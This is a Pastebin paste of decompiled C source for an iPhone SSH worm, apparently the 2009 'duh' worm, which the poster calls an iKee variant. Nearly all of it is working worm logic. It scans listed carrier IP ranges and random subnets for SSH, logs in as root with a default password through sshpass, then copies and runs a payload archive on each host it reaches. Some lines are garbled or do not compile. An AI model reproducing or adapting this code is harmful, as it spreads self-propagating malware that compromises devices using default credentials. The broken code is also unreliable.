Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- This file has been generated by the Hex-Rays decompiler.
- Copyright (c) 2007-2015 Hex-Rays <info@hex-rays.com>
- Detected compiler: GNU C++
- /// NOTE ///
- As you can see, the 'duh' worm of 2009 is just another
- iKee variant, the decompiled code is VERY much the exact same
- except that debug messages were mostly removed, and the infection
- routine was modified...
- /// END ///
- */
- #include "sshd.h"
- int fdlock;
- //----- (00001984) --------------------------------------------------------
- char *randHost() // Generates a random SubNet to scan...
- {
- char *retme;
- int x = random() % 255;
- int y = random() % 255;
- int z = random() % 255;
- srand(time(0));
- asprintf(&retme, "%i.%i.%i.", x, y, z);
- return retme;
- }
- //----- (00001A80) --------------------------------------------------------
- int get_lock(void) // Sets/Gets the status of the file lock located in /var/lock/ssh.lock
- {
- struct flock fl;
- fl.l_type = F_WRLCK;
- fl.l_whence = SEEK_SET;
- fl.l_start = 0;
- fl.l_len = 1;
- if((fdlock = open("/var/lock/ssh.lock", O_WRONLY|O_CREAT, 0666)) == -1)
- return 0;
- if(fcntl(fdlock, F_SETLK, &fl) == -1)
- return 0;
- return 1;
- }
- //----- (00001B70) --------------------------------------------------------
- char *getAddrRange()
- {
- struct ifaddrs, *ifaddr, *ifa;
- int family, s;
- char host[NI_MAXHOST];]
- if (getifaddrs(&ifaddr) == -1) {
- perror("getifaddrs");
- exit(EXIT_FAILURE);
- }
- for (ifa = ifaddr; ifa != NULL; i = ifa->ifa_next) {
- family = ifa->ifa_addr->sa_family;
- if (family == AF_INET || family == AF_INET6)
- {
- s = getnameinfo(ifa->ifa_addr,(family == AF_INET) ? sizeof(struct sockaddr_in): sizeof(struct sockaddr_in6), host, NI_MAXHOST, NULL, 0, NI_NUMERICHOST);
- if (s != 0) {
- printf("getnameinfo() failed: %s\n", gai_strerror(s));
- return "0.0.0.0-0.0.0.0";
- }
- if (!strcmp(ifa->ifa_name, "pdp_ip0")) {
- char *wee[20];
- tokenise(host, wee, ".");
- int octc = atoi(wee[2]);
- asprintf((char*)&range, "%s.%s.%i.0-%s.%s.%i.255", wee[0], wee[1], octc, wee[0], wee[1], octc+2);
- return (char*)range;
- }
- }
- }
- freeifaddrs(ifaddr);
- return "0.0.0.0-0.0.0.0";
- }
- //----- (00001DB4) --------------------------------------------------------
- int tokenise(char *input[], char *token[], char *spl)
- {
- char *tokens;
- int count = 0;
- tokens = strtok(input, spl);
- if(tokens[strlen(tokens)-1] == '\n') tokens[strlen(tokens)-1] = '\0';
- token[count] = tokens;
- while(tokens != NULL) {
- count++;
- if(count > 4096) return (-1);
- tokens = strtok(NULL, spl);
- if(tokens != NULL) {
- if(tokens[strlen(tokens)-1] == '\n') tokens[strlen(tokens)-1] = '\0';
- }
- token[count] = tokens;
- }
- return count;
- }
- //----- (00001F1C) --------------------------------------------------------
- int main() {
- if (get_lock()) {
- sleep(60);
- char *ipRanges[] = { getAddrRange(), // Local Net
- "94.157.100.0-94.157.255.255", // T-mobile, Netherlands
- "87.103.52.255-87.103.66.255", // Vodafone, Portugal
- "94.157.0.0.0-120.157.99.255", // T-mobile, Netherlands
- "114.72.0.0-114.75.255.255", // OPTUSINTERNET, Australia
- "92.248.90.0-92.248.120.255", // MOBILKOM, Austria
- "81.217.74.0-81.217.74.255", // Kabelsignal AG, Austria
- "84.224.60.0-84.224.80.255", // Pannon GSM Telecommunications Inc, Hungary
- "188.88.100.0-188.88.160.255", // T-mobile, Netherlands
- "77.248.140.0-77.248.146.255", // UPC broadband, Austria
- "77.54.160.0-77.54.190.255", // Vodafone, Portugal
- "80.57.116.0-80.57.131.255", // UPC broadband, Austria
- "84.224.0.0-84.224.63.255" }; // Pannon GSM Telecommunications Inc, Hungary
- while(1) {
- for(int j = 0; j < sizeof(ipRanges); ++j) {
- scanner(ipRanges[j]);
- for (int k = 0; k <= 2; ++k) {
- randSubNet = randHost();
- char *zeRange;
- asprintf(&zeRange, "%s.0-%s.255", randSubNet, randSubNet);
- scanner(zeRange);
- }
- }
- }
- return 1;
- }
- //----- (00002110) --------------------------------------------------------
- void scanner(char *ipRange)
- {
- char *wee[10];
- char *begin[10];
- char *end[10];
- tokenise(ipRange, wee, "-");
- int octaB, octaE, octbB, octbE, octcB, octcE;
- tokenise(wee[0], begin, ".");
- tokenise(wee[1], end, ".");
- octaB = atoi(begin[0]);
- octaE = atoi(end[0]);
- octbB = atoi(begin[1]);
- octbE = atoi(end[1]);
- octcB = atoi(begin[2]);
- octcE = atoi(end[2]);
- for (int loop1=octaB; loop1<=octaE; loop1++)
- {
- for (int loop2=octbB; loop2<=octbE; loop2++)
- {
- for (int loop3=octcB; loop3<=octcE; loop3++)
- {
- for (int loop4=0; loop4<=255; loop4++)
- {
- char* host;
- asprintf(&host, "%i.%i.%i.%i", loop1, loop2, loop3, loop4);
- if (!scanHost(host) && !checkHost(host))
- {
- initfst(host);
- }
- }
- }
- }
- }
- }
- //----- (00002314) --------------------------------------------------------
- int scanHost(char* host)
- {
- int res, valopt, soc;
- struct sockaddr_in addr;
- long arg;
- fd_set myset;
- struct timeval tv;
- socklen_t lon;
- soc = socket(AF_INET, SOCK_STREAM, 0);
- arg = fcntl(soc, F_GETFL, NULL);
- arg |= O_NONBLOCK;
- fcntl(soc, F_SETFL, arg);
- addr.sin_family = AF_INET;
- addr.sin_port = htons(22);
- addr.sin_addr.s_addr = inet_addr(host);
- res = connect(soc, (struct sockaddr *)&addr, sizeof(addr));
- if (res < 0) {
- if (errno == EINPROGRESS) {
- tv.tv_sec = 10;
- tv.tv_usec = 0;
- FD_ZERO(&myset);
- FD_SET(soc, &myset);
- if (select(soc+1, NULL, &myset, NULL, &tv) > 0) {
- lon = sizeof(int);
- getsockopt(soc, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
- if (valopt) {
- return -1;
- }
- }
- else {
- return -1; }
- }
- else { return -1; }
- }
- close(soc);
- return 0;
- }
- //----- (000024E0) --------------------------------------------------------
- int checkHost(char *host) {
- FILE *in;
- extern FILE *popen();
- char buff[512];
- char *execLine;
- syslog(LOG_DEBUG, "%s", host); // One of the few times he decides to call a SYSLOG.
- asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'", VULN_PASS, host);
- if (in = popen(execLine, "r")) {
- while (fgets(buff, 2, in) != NULL) {
- if (strcmp(buff, "99"))
- return 0;
- }
- }
- pclose(in);
- return -1; // NOT VULN
- }
- //----- (000025DC) --------------------------------------------------------
- int runCommand(char* command, char *host) {
- FILE *in;
- extern FILE *popen();
- char buff[512];
- char *execLine;
- asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s ; echo 99'", VULN_PASS, host, command);
- if (in = popen(execLine, "r")) {
- while (fgets(buff, 2, in) != NULL) {
- if (strcmp(buff, "99")) return 0;
- }
- }
- pclose(in);
- return -1;
- }
- //----- (000026D8) --------------------------------------------------------
- int prunCommand(char* command, char *host) {
- FILE *in;
- extern FILE *popen();
- char buff[512];
- char *execLine;
- asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s'", VULN_PASS, host, command);
- if (in = popen(execLine, "r")) {
- while (fgets(buff, sizeof(buff), in) != NULL) {
- printf("%s", buff);
- }
- }
- pclose(in);
- return -1;
- }
- //----- (000027BC) --------------------------------------------------------
- int CopyFile(char* src, char* dst, char* host) {
- FILE *in;
- extern FILE *popen();
- char buff[512];
- char *execLine;
- asprintf(&execLine, "sshpass -p %s scp -o StrictHostKeyChecking=no ./%s root@%s:%s", VULN_PASS, src, host, dst);
- if (in = popen(execLine, "r")) {
- while (fgets(buff, sizeof(buff), in) != NULL) {}
- asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'which %s'", VULN_PASS, host, dst);
- if (in = popen(execLine, "r")) {
- while (fgets(buff, 2, in) != NULL ) {
- if (strcmp(buff, dst))
- return 0;
- }
- return -1;
- }
- return -1;
- }
- pclose(in);
- return -1;
- }
- //----- (0000294C) --------------------------------------------------------
- int initfst(char *host) {
- if (!runCommand("mkdir /private/var/mobile/home", host))
- {
- if (!CopyFile("/private/var/mobile/home/cydia.tgz", "/private/var/mobile/home/cydia.tgz", host))
- prunCommand("cd /private/var/mobile/home/;tar xzf cydia.tgz;./inst", host);
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement